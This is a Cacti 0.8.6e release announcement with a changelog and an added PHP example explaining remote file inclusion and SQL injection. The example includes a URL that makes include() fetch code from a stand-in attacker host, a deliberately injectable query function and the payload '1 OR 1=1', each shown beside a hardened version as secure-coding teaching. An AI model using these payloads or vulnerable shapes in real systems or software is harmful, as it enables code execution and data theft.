This version addresses two serious security issues pointed out by the iDEFENSE group, so it is recommended that all users upgrade. In summary, one of the security vulnerabilities is related to improperly validated input, while the other is a cross-site scripting bug.
For 0.8.6d users who need the security fixes without an entirely new release, please see the 0.8.6d security patch.
Even though this release is focused on security, there are quite a few notable bug fixes and a few small features as well. In general the bug fixes are related to data sources, RRDtool 1.2 support, and the poller. It is worth noting that the bug introduced in 0.8.6d which caused graph gaps under certain conditions has been addressed. In the features department, there are a few enhancements related to RRDtool 1.2 and numerous speedups in the UI, among other things.
As always, be sure to read the release notes before upgrading. The complete changelog is below.
-bug#0000143: Allow the user to enter 'U' for unknown minimum and maximum data source input values.
-bug#0000377: Fix logarithmic graph creation issues.
-bug#0000392: Implement caching to reduce the number of SQL queries needed to render the graph tree.
-bug#0000402/#0000457: Allow bounds to be set properly for logarithmic graph creation.
-bug#0000428: Unable to try login again after Access Denied.
-bug#0000450: Force strict checking for data query parsing to prevent numeric values from being incorrectly handled.
-bug#0000453: SPAN tag between each character of GraphTitle in Graph Management.
-bug#0000458: Generate an error message and exit poller.php if the cactid binary path is invalid.
-bug#0000463: Fix Syslog logging of poller statistics.
-bug#0000464: Remove dates from Syslog generated messages.
-bug#0000465: Allow for the mass resize of graphs.
-bug#0000471: Remove the graph 'Settings' tab if the user is not allowed to save graph settings.
-bug#0000478: Validate field input values on the Data Templates page. Prevent duplicate data template items from appearing as a result of this bug.
-bug#0000481: Add several checks to prevent PHP errors when parsing data query XML files.
-bug: Graph zoom feature had incorrect bounding box when using RRD 1.2.x.
-bug: Speed the generation of the Tree View Dual Pane by caching the Tree to a local session variable.
-bug: Handle STACK graph items properly in RRDtool 1.2.
-bug: Prevent data query recaches if the device returns empty input.
-bug: Fix potential issues with graph gaps when using a large number of poller processes.
-bug: Fix issues when zooming with new RRDtool 1.2 title fonts with a point size other than 10.
-bug: Fix issues when zooming outside of the select areas causing a broken graph.
-bug: Fix issues experienced when users attempted to create custom graphs and thousands of data sources exist.
-feature: Add ability to filter by host status as well as add ability to filter across both description and hostname.
-feature: Add additional options to control RRDtool 1.2 fonts.
-feature: Allow the user to Enable/Disable Data Sources from the user interface and automatically disable hosts when deleting a device.
-feature: Add Data Source information to the Cacti Log File to assist with troubleshooting.
-feature: Add html links to both hosts and data sources in the Cacti Log File.
-security: Fix several remote inclusion bugs that were exploitable when PHP's 'register_globals' feature is turned on [IDEF0941], [IDEF1023], [IDEF1024].
-security: Fix several SQL injection bugs due to improper input validation [IDEF1001].
-Ian
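The two security items in the changelog above, remote inclusion that depends on register_globals and SQL injection from unvalidated input, are illustrated below as an added example. This is not Cacti's code and not the patched code from the 0.8.6e release; the table, column and plugin names are hypothetical, the vulnerable shapes are shown as they commonly appeared in PHP 4-era applications, and the hardened versions use PDO with an in-memory SQLite table (constructed sample data) so the file runs stand-alone on a modern PHP with the pdo_sqlite extension.

```php
<?php
// Added example, not Cacti's code. Shows the two bug classes named in the
// 0.8.6e changelog as a vulnerable shape beside a hardened one.

/*
 * 1. Remote inclusion via register_globals.
 *
 * Vulnerable shape (top-level code in an include file; hypothetical):
 *
 *     include($config["library_path"] . "/functions.php");
 *
 * If that file is requested directly, $config was never assigned by the
 * application. With register_globals=On, PHP pre-populates variables from the
 * request, so a URL such as
 *     /path/to/file.php?config[library_path]=http://evil.example/
 * makes include() fetch and execute http://evil.example//functions.php
 * (when allow_url_fopen permits URL includes). The fix is to never derive an
 * include path from state a request can seed: initialise the variable yourself,
 * and resolve file names against a fixed directory and an allowlist.
 */

// Hardened shape: fixed base directory plus an allowlist of plugin names.
// realpath() collapses "../" and never resolves a URL wrapper to a local path,
// and the prefix check refuses anything that escapes $base.
function resolve_plugin_path($base, $name) {
    $allowed = array("snmp", "script", "cmd");   // hypothetical plugin names
    if (!in_array($name, $allowed, true)) {
        return false;
    }
    $base = realpath($base);
    if ($base === false) {
        return false;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . ".php");
    if ($path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;   // safe to pass to include()
}

// 2. SQL injection from improper input validation.

// Vulnerable shape: request data concatenated straight into the query, so
// "1 OR 1=1" returns every host instead of one.
function get_host_vulnerable(PDO $db, $host_id) {
    $stmt = $db->query("SELECT id, hostname FROM host WHERE id = " . $host_id);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened shape: validate the type strictly (an id is a run of digits) AND
// bind it as a parameter, so the value can never be parsed as SQL.
function get_host_hardened(PDO $db, $host_id) {
    if (!preg_match('/^[0-9]+$/', (string)$host_id)) {
        return false;   // rejected before it reaches the database
    }
    $stmt = $db->prepare("SELECT id, hostname FROM host WHERE id = :id");
    $stmt->bindValue(':id', (int)$host_id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Demo on a constructed in-memory SQLite table (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE host (id INTEGER PRIMARY KEY, hostname TEXT)");
$db->exec("INSERT INTO host VALUES (1, 'router1'), (2, 'switch1')");

$evil = "1 OR 1=1";
printf("vulnerable query returned %d row(s)\n", count(get_host_vulnerable($db, $evil)));
printf("hardened query with evil input: %s\n", var_export(get_host_hardened($db, $evil), true));
printf("hardened query with valid input returned %d row(s)\n", count(get_host_hardened($db, "1")));
printf("plugin path for 'snmp': %s\n", var_export(resolve_plugin_path(__DIR__, "snmp"), true));
```

The plugin lookup returns false in the demo because no plugins/ directory exists beside the script; the point is the order of checks (allowlist first, then realpath, then the prefix test), which is the same whether or not the file is present. Validating the id with a regular expression and also binding it is deliberate: the regex rejects garbage early with a clean error path, and the bound parameter protects the query even if a later caller bypasses the check.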